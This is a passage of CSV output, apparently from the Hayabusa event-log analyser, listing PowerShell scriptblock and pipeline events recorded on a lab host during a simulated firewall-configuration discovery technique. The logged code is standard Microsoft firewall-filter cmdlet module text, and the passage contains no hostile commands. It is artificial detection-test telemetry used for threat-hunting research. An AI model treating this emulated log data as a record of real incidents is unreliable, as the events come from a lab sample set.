($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallAddressFilter'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.832 
+09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.832 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.832 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LocalIP')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='Query 
(cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('RemoteIP')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.832 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallApplicationFilter ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.832 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { 
Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetApplicationFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Program}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Package}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Program') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${Program}) $__cmdletization_queryBuilder.FilterByProperty('AppPath', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Package') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Package}) $__cmdletization_queryBuilder.FilterByProperty('Package', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByApplication', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallApplicationFilter' function Set-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] 
[OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { 
$__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 
'Set-NetFirewallApplicationFilter'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.848 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.848 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.848 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.848 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline 
